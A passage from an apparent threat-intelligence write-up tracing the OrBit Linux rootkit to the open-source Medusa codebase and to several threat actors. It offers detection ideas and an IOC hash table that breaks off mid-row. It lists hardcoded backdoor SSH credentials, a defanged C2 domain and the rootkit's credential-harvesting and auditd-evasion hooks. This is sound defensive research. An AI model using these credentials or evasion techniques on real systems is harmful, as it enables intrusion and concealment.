&lt;h3&gt;Samples From February 2026&lt;span class="hx:absolute hx:-mt-20" id="samples-from-february-2026"&gt;&lt;/span&gt;
&lt;a href="#samples-from-february-2026" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;04c06be0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;jokerteam&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;HACK89SERVER&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;64&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2b2eeb22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;57ill4Cu63&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1qaz@WSX3edc098&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;64&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;These two samples are confirmed to be identical in structure: the same 54-hook
set, the same XOR key (0xA2), and the same working directory
(&lt;code&gt;/lib/libseconf/&lt;/code&gt;). The only difference is credentials:
&lt;code&gt;jokerteam&lt;/code&gt;/&lt;code&gt;HACK89SERVER&lt;/code&gt; versus &lt;code&gt;57ill4Cu63&lt;/code&gt;/&lt;code&gt;1qaz@WSX3edc098&lt;/code&gt;. XOR 0xA2
decode confirms the full Lineage A string set.&lt;/p&gt;
&lt;p&gt;No Lineage B samples have surfaced since 2024, suggesting the lite build may
have been retired or consolidated back into the main branch.&lt;/p&gt;
&lt;h3&gt;Connection to BLOCKADE SPIDER&lt;span class="hx:absolute hx:-mt-20" id="connection-to-blockade-spider"&gt;&lt;/span&gt;
&lt;a href="#connection-to-blockade-spider" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In CrowdStrike’s 2026 Global Threat
&lt;a href="https://www.crowdstrike.com/explore/2026-global-threat-report"target="_blank" rel="noopener"&gt;Report&lt;/a&gt;, they
mention that
&lt;a href="https://www.crowdstrike.com/en-us/adversaries/blockade-spider/"target="_blank" rel="noopener"&gt;BLOCKADE SPIDER&lt;/a&gt;
used the OrBit backdoor to maintain persistence and stealthy access to
virtualization environments.&lt;/p&gt;
&lt;p&gt;BLOCKADE SPIDER is a CrowdStrike-tracked eCrime adversary that has been active
at least since 2024. They are known for running Embargo ransomware campaigns
using sophisticated, multi-domain attack techniques.&lt;/p&gt;
&lt;h2&gt;Origin: OrBit is a Fork of the Medusa Open-Source Rootkit&lt;span class="hx:absolute hx:-mt-20" id="origin-orbit-is-a-fork-of-the-medusa-open-source-rootkit"&gt;&lt;/span&gt;
&lt;a href="#origin-orbit-is-a-fork-of-the-medusa-open-source-rootkit" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Mandiant&amp;rsquo;s reporting on
&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"target="_blank" rel="noopener"&gt;UNC3886 espionage operations&lt;/a&gt;
identifies MEDUSA and its installer, SEAELF, as tools used by this
state-sponsored actor against Juniper and VMware infrastructure. Essentially,
OrBit is built from Medusa, an open-source LD_PRELOAD rootkit published on
GitHub (&lt;a href="http://github.com/ldpreload/Medusa"target="_blank" rel="noopener"&gt;github.com/ldpreload/Medusa&lt;/a&gt;) in
December 2022.&lt;/p&gt;
&lt;p&gt;Mandiant&amp;rsquo;s MEDUSA configuration table matches our 2024 Lineage A 0xAA-key
cluster exactly across four independent fields: the XOR key &lt;code&gt;0xAA&lt;/code&gt;, the
backdoor credentials &lt;code&gt;Y0u4reCu6e&lt;/code&gt; and &lt;code&gt;1qaz@WSX3edc123&lt;/code&gt;, the install path
/lib/locate/, and a modification to the rootkit that redirects strace output to
&lt;code&gt;/tmp/orbit.txt&lt;/code&gt;. That literal &lt;code&gt;orbit&lt;/code&gt; filename, preserved as a plaintext
artifact inside UNC3886&amp;rsquo;s MEDUSA binary, is direct cross-attribution:
Mandiant&amp;rsquo;s &amp;ldquo;MEDUSA&amp;rdquo; sample set and our &amp;ldquo;OrBit&amp;rdquo; 2024 cluster are the same
builds.&lt;/p&gt;
&lt;p&gt;We compiled Medusa from source and compared the resulting binaries
byte-for-byte against our OrBit corpus. The match is unambiguous, and it
rewrites the attribution and evolution story.&lt;/p&gt;
&lt;h3&gt;Evidence of the Fork&lt;span class="hx:absolute hx:-mt-20" id="evidence-of-the-fork"&gt;&lt;/span&gt;
&lt;a href="#evidence-of-the-fork" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The first is a function-set and export match. Compiling Medusa&amp;rsquo;s
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rkld.c"target="_blank" rel="noopener"&gt;src/rkld.c&lt;/a&gt;
against the default
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/Makefile#L30"target="_blank" rel="noopener"&gt;Makefile recipe&lt;/a&gt;
produces a shared object whose function set, hook list, and XOR-obfuscated
string table are a direct superset match for OrBit Lineage A samples. The 2022
OrBit baseline (&lt;code&gt;ec7462c3&lt;/code&gt;) shares all core exports with the Medusa build and
reuses the identical XOR 0xA2 string obfuscation scheme driven by Medusa&amp;rsquo;s
build-time
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/config.c#L180"target="_blank" rel="noopener"&gt;xor_dump() pipeline&lt;/a&gt;,
with the XOR key itself hardcoded in
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/config.c#L349"target="_blank" rel="noopener"&gt;config.c&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The second is a source-filename fingerprint that is present in almost every
sample we analyzed. Some of the samples ship with an unstripped ELF &lt;code&gt;.symtab&lt;/code&gt;.
The resulting filenames are preserved verbatim: rootkit samples carry &lt;code&gt;rkld.c&lt;/code&gt;
and, when Lineage A is linked in, &lt;code&gt;rknet.c&lt;/code&gt;, while loader samples carry
&lt;code&gt;rkload.c&lt;/code&gt;. Those are the exact names of Medusa&amp;rsquo;s source files,
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rkld.c"target="_blank" rel="noopener"&gt;src/rkld.c&lt;/a&gt;,
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c"target="_blank" rel="noopener"&gt;src/rknet.c&lt;/a&gt;, and
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rkload.c"target="_blank" rel="noopener"&gt;src/rkload.c&lt;/a&gt;.
The filenames themselves are not secret, since the Medusa repository is public,
but their verbatim presence in the compiled binary is a strong attribution
anchor: every unstripped sample directly identifies the upstream tree it was
built from. Of the samples in our corpus, only three are fully stripped (the
2025 dropper &lt;code&gt;73b95b7d&lt;/code&gt;, and the rootkit binaries &lt;code&gt;a6138638&lt;/code&gt; and &lt;code&gt;b9822764&lt;/code&gt;).
Three representative samples are shown below: a full Lineage A rootkit
(&lt;code&gt;ec7462c3&lt;/code&gt;, 2022), a Lineage B lite rootkit (&lt;code&gt;3ba6c174&lt;/code&gt;, 2023), and the SEAELF
loader (&lt;code&gt;26082cd3&lt;/code&gt;, 2024).&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ readelf -s ec7462c3f4a874... &lt;span class="p"&gt;|&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;/FILE LOCAL/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 25: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 34: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS rkld.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 40: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS rknet.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 46: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ readelf -s 3ba6c174a72e4b... &lt;span class="p"&gt;|&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;/FILE LOCAL/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 1: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 9: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS rkld.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 15: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ readelf -s 26082cd36fdaf7... &lt;span class="p"&gt;|&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;/FILE LOCAL/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 1: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 9: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS rkload.c
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 14: &lt;span class="m"&gt;0000000000000000&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; FILE LOCAL DEFAULT ABS crtstuff.c&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The Lineage A rootkit carries both &lt;code&gt;rkld.c&lt;/code&gt; and &lt;code&gt;rknet.c&lt;/code&gt;; the Lineage B
rootkit, which omits the advanced hook set, carries only &lt;code&gt;rkld.c&lt;/code&gt;; and the
loader carries &lt;code&gt;rkload.c&lt;/code&gt;. The same pattern holds across the wider corpus.&lt;/p&gt;
&lt;p&gt;Alongside the filename fingerprint, the loader&amp;rsquo;s entry-point dispatch, its
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rkload.c#L67"target="_blank" rel="noopener"&gt;build_root()&lt;/a&gt;
filesystem layout (&lt;code&gt;.boot.sh&lt;/code&gt;, &lt;code&gt;.logpam&lt;/code&gt;, &lt;code&gt;sshpass.txt&lt;/code&gt;, &lt;code&gt;sshpass2.txt&lt;/code&gt;,
&lt;code&gt;.ports&lt;/code&gt;), and its SELinux &lt;code&gt;setxattr&lt;/code&gt; sequence all map one-to-one to the Medusa
source.&lt;/p&gt;
&lt;p&gt;The third is an embedded inner ELF produced by &lt;code&gt;xxd -i&lt;/code&gt;. Medusa&amp;rsquo;s Makefile
embeds &lt;code&gt;build/rkld.so&lt;/code&gt; into the loader using the
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/Makefile#L31"target="_blank" rel="noopener"&gt;xxd -i build/rkld.so &amp;gt; build/rkld.h&lt;/a&gt;
step, which is then included by the loader compiled at
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/Makefile#L33"target="_blank" rel="noopener"&gt;Makefile line 33&lt;/a&gt;.
OrBit&amp;rsquo;s loader binaries follow this pattern: a &lt;code&gt;rkld.so&lt;/code&gt; blob embedded as a C
byte array within the loader ELF, dropped to disk at runtime. The embedding
technique, offset layout, and post-drop execution flow are identical.&lt;/p&gt;
&lt;h3&gt;Per-Module Source Mapping&lt;span class="hx:absolute hx:-mt-20" id="per-module-source-mapping"&gt;&lt;/span&gt;
&lt;a href="#per-module-source-mapping" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Medusa&amp;rsquo;s source tree maps cleanly onto the OrBit binary set we have tracked:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Medusa source&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Corresponding OrBit artifact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;src/rkld.c&lt;/td&gt;
&lt;td&gt;Main rootkit (libc hooks, PAM harvest, file/proc/net hiding)&lt;/td&gt;
&lt;td&gt;All Lineage A / Lineage B rootkit .so samples&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;src/rkload.c&lt;/td&gt;
&lt;td&gt;Installer / SEAELF loader (patches ld.so, writes /etc/ld.so.preload, drops inner rootkit)&lt;/td&gt;
&lt;td&gt;26082cd3 and related loader/installer samples&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;src/rknet.c&lt;/td&gt;
&lt;td&gt;Advanced hooks: xread, audit_log_acct_message, audit_log_user_message, pam_sm_authenticate, pcap_loop, port-hiding&lt;/td&gt;
&lt;td&gt;Not compiled in the default Makefile. Linked in only in Lineage A &amp;ldquo;full&amp;rdquo; builds.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The Medusa default &lt;code&gt;Makefile&lt;/code&gt; compiles only &lt;code&gt;src/rkld.c&lt;/code&gt;. Every Lineage A
capability that appeared to &amp;ldquo;arrive&amp;rdquo; in OrBit between 2023 and 2025 was already
present as source in Medusa&amp;rsquo;s &lt;code&gt;src/rknet.c&lt;/code&gt; on day one of the public release.
The operators&amp;rsquo; work was to modify the Makefile to link &lt;code&gt;rknet.c&lt;/code&gt; into their
build, not to author those functions.&lt;/p&gt;
&lt;h3&gt;Timeline Anomaly&lt;span class="hx:absolute hx:-mt-20" id="timeline-anomaly"&gt;&lt;/span&gt;
&lt;a href="#timeline-anomaly" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Our analysis shows that an initial OrBit sample (&lt;code&gt;40b5127c&lt;/code&gt;) appeared in July
2022, predating the repository&amp;rsquo;s publication by approximately 5 months. Based
on this information, there are two options: either the Medusa author published
a privately-circulated rootkit source that had already been deployed
operationally, or the earliest OrBit sample was built from a pre-publication
snapshot of the same tree. Either way, the 2022 OrBit sample and the December
2022 Medusa source tree are the same codebase. The question is only which
commit was made public first.&lt;/p&gt;
&lt;h3&gt;Implications&lt;span class="hx:absolute hx:-mt-20" id="implications"&gt;&lt;/span&gt;
&lt;a href="#implications" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The appearance of a single rootkit family across four years does not imply a
single operator. OrBit and Medusa have been built and deployed by at least
three unrelated actor clusters we can presently distinguish, including the
state-sponsored espionage activity attributed to UNC3886, the eCrime ransomware
operations run by BLOCKADE SPIDER, and the 2025 cron-dropper campaign
previously linked to RHOMBUS infrastructure. Attribution at the family level is
therefore not enough, and defenders tracking an OrBit infection should separate
the questions of which codebase was used from which operator configured and
deployed it.&lt;/p&gt;
&lt;p&gt;Tracking version-over-version changes in OrBit reads less like an active
malware development project and more like a record of build-flag toggles,
credential rotations, and install-path swaps against a stable upstream. The
capability ceiling is set by the Medusa source tree as it existed in December
2022, and every apparent new feature we observed between 2023 and 2025 was
already present in that tree, waiting for an operator to link it in. The
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L118"target="_blank" rel="noopener"&gt;xread read-hook bypass&lt;/a&gt;
we first flagged as a 2023 compatibility shim is a function in &lt;code&gt;src/rknet.c&lt;/code&gt;.
The auditd evasion pair we called out as a 2024 addition,
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L192"target="_blank" rel="noopener"&gt;audit_log_acct_message&lt;/a&gt;
and
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L235"target="_blank" rel="noopener"&gt;audit_log_user_message&lt;/a&gt;,
sits in the same file. The PAM stack we noted as gradually expanding across
versions, including
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L305"target="_blank" rel="noopener"&gt;pam_authenticate&lt;/a&gt;,
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L350"target="_blank" rel="noopener"&gt;pam_acct_mgmt&lt;/a&gt;,
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L365"target="_blank" rel="noopener"&gt;pam_open_session&lt;/a&gt;,
and the 2025 service-side impersonation hook
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L381"target="_blank" rel="noopener"&gt;pam_sm_authenticate&lt;/a&gt;,
is all present in the same &lt;code&gt;rknet.c&lt;/code&gt;, as is the
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rknet.c#L491"target="_blank" rel="noopener"&gt;pcap_loop&lt;/a&gt;
packet hook that appears in full Lineage A builds. None of these files is
linked in by the
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/Makefile#L30"target="_blank" rel="noopener"&gt;default Makefile recipe&lt;/a&gt;,
which compiles only &lt;code&gt;src/rkld.c&lt;/code&gt;. Their arrival in individual OrBit samples
corresponds to an operator modifying the build to include rknet.c, not to new
code being written.&lt;/p&gt;
&lt;p&gt;Signatures based on invariants of the Medusa build pipeline will also flag
builds from operators we have not yet seen. Three such invariants are worth
calling out.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The string table produced by Medusa&amp;rsquo;s
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/config.c#L180"target="_blank" rel="noopener"&gt;xor_dump() routine&lt;/a&gt;,
which emits every protected string as a contiguous block of single-byte
XOR-obfuscated byte arrays within the compiled binary. Operators change the
key value (0xA2 in most builds, 0xAA in the 2024 UNC3886 cluster) and some
paths, but the table&amp;rsquo;s shape and the majority of its entries are fixed by the
source. A YARA rule that decodes the table with a variable single-byte key
and matches on a threshold count of known plaintext strings catches any
build, regardless of which key was chosen.&lt;/li&gt;
&lt;li&gt;The filesystem skeleton that the loader&amp;rsquo;s
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/src/rkload.c#L67"target="_blank" rel="noopener"&gt;build_root()&lt;/a&gt;
writes into its install directory. Operators vary only the parent directory
(&lt;code&gt;/lib/libseconf/&lt;/code&gt;, &lt;code&gt;/lib/locate/&lt;/code&gt;, &lt;code&gt;/lib/libntpVnQE6mk/&lt;/code&gt;), so host-based
detection can alert on the co-occurrence of that filename set inside any
directory, and binary-level signatures can match the embedded filename
constants and the &lt;code&gt;setxattr&lt;/code&gt; call pattern directly.&lt;/li&gt;
&lt;li&gt;The nested-ELF structure produced by the
&lt;a href="https://github.com/ldpreload/Medusa/blob/master/Makefile#L31"target="_blank" rel="noopener"&gt;xxd - +i build/rkld.so &amp;gt; build/rkld.h&lt;/a&gt;
step in the Makefile, which bakes a full secondary ELF into the loader&amp;rsquo;s
&lt;code&gt;.rodata&lt;/code&gt;. Every Medusa loader therefore carries a second ELF magic inside
its own image, followed by a length constant, and, if the binary is not
stripped, two &lt;code&gt;xxd&lt;/code&gt;-generated symbols (&lt;code&gt;rkld_so&lt;/code&gt; and &lt;code&gt;rkld_so_len&lt;/code&gt; ). The
nested-ELF shape on its own is not specific enough to be a detection
signature: plenty of legitimate software and unrelated malware use &lt;code&gt;xxd -i&lt;/code&gt;
or equivalent techniques to embed a payload, and any such binary will match a
naive &amp;ldquo;second ELF at non-zero offset plus length constant&amp;rdquo; rule. The
Medusa-specific part is the pairing of that structural pattern with (a) the
symbol names &lt;code&gt;rkld_s&lt;/code&gt;o and &lt;code&gt;rk +ld_so_len&lt;/code&gt; in the loader&amp;rsquo;s symbol table when
the binary is not stripped, and (b) the inner ELF itself, matching the
rootkit fingerprint described earlier in this section, which gives both a
family-level anchor and a structural one.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The analysis of OrBit variants from 2022 through early 2026 reveals a Linux
rootkit whose code later surfaced in an open-source codebase named Medusa. This
suggests that the backdoor was created before its public release and has since
been selectively forked, configured, and redeployed by multiple operators over
four years. We identified two parallel build paths: the comprehensive Lineage A
(&amp;ldquo;Full&amp;rdquo; build), which links in Medusa&amp;rsquo;s &lt;code&gt;src/rknet.c&lt;/code&gt; advanced hook set, and
the temporary Lineage B (lite build), which ships only the &lt;code&gt;src/rkld.c&lt;/code&gt; core
and was retired after 2024. Apparent &amp;ldquo;milestones&amp;rdquo; in Lineage A are the xread
wrapper (2023), the audit_log_* auditd-evasion hooks (2024), and the 2025
addition of the &lt;code&gt;pam_sm_authenticate&lt;/code&gt; hook, which corresponds one-to-one with
functions already present in Medusa&amp;rsquo;s published source. The operator work is in
the build configuration and deployment, not the C code.&lt;/p&gt;
&lt;p&gt;Our analysis of the OrBit samples also discovered that at least 3 different
operators are using the backdoor. A major operational shift occurred in 2025
with the introduction of a new two-stage infector architecture, marking one
operator&amp;rsquo;s transition from a purely passive SSH-backdoor implant to malware
with its first direct C2 capability. This infector utilizes a cron job to fetch
external payloads from the domain cf0[.]pw. The architecture of this new
dropper is identical to one used in the 2020 RHOMBUS botnet campaign,
suggesting shared tooling or operator overlap, a link further cemented by the
C2 domain resolving to infrastructure located in Russia. In parallel, the same
Medusa codebase was weaponized upstream by the state-sponsored espionage actor
UNC3886 (tracked by Mandiant). The 2024 0xAA-key cluster we tracked as Lineage
A corresponds exactly to UNC3886&amp;rsquo;s MEDUSA configuration, including the backdoor
credentials, the install path, and a strace artifact that retains the literal
&amp;ldquo;orbit&amp;rdquo; string. The rootkit has also been adopted by the CrowdStrike-tracked
eCrime adversary BLOCKADE SPIDER since at least 2024, who leverage OrBit for
stealthy persistence against VMware vCenter infrastructure to facilitate the
deployment of Embargo ransomware. The continued emergence of new Lineage A
samples in 2026, accompanied by operator-specific credential rotation, confirms
that a single public rootkit codebase is being cloned and configured by
multiple unrelated actor groups.&lt;/p&gt;
&lt;h2&gt;IOC Table&lt;span class="hx:absolute hx:-mt-20" id="ioc-table"&gt;&lt;/span&gt;
&lt;a href="#ioc-table" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SHA256&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Lineage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ec7462c3f4a87430eb19d16cfd775c173f4ba60d2f43697743db991c3d1c3067&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;d419a9b17f7b4c23fd4e80a9bce130d2a13c307fccc4bfbc4d49f6b770d06d3b&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;296d28eb7b66aa2cbea7d9c2e7dc1ad6ce6f97d44d34139760c38817aec083e7&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3ba6c174a72e4bf5a10c8aaadab2c4b98702ee2308438e94a5512b69df998d5a&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4203271c1a0c24443b7e85cbf066c9928fcc69934772a431d779017fb85c9d73&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eea274eddd712fe0b4434dbef6a2a92810cb13b8be3deca0571410ee78d37c9f&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;a61386384173b352e3bd90dcef4c7268a73cd29f6ae343c15b92070b1354a349&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;a34299a16cf30dac1096c1d24188c72eed1f9d320b1585fe0de4692472e3d4dc&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;b1dd18a6a4b0c6e2589312bbec55b392a20a95824ffe630a73c94d24504c553d&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;989f7eb4f805591839bcbc321dd44418eb5694d1342e37b7f24126817f10e37e&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;payload (extracted)&lt;/td&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8ea420d9aa341ba23cdea0ac03951bce866c933ba297268bc7db8a01ce8e9b8e&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
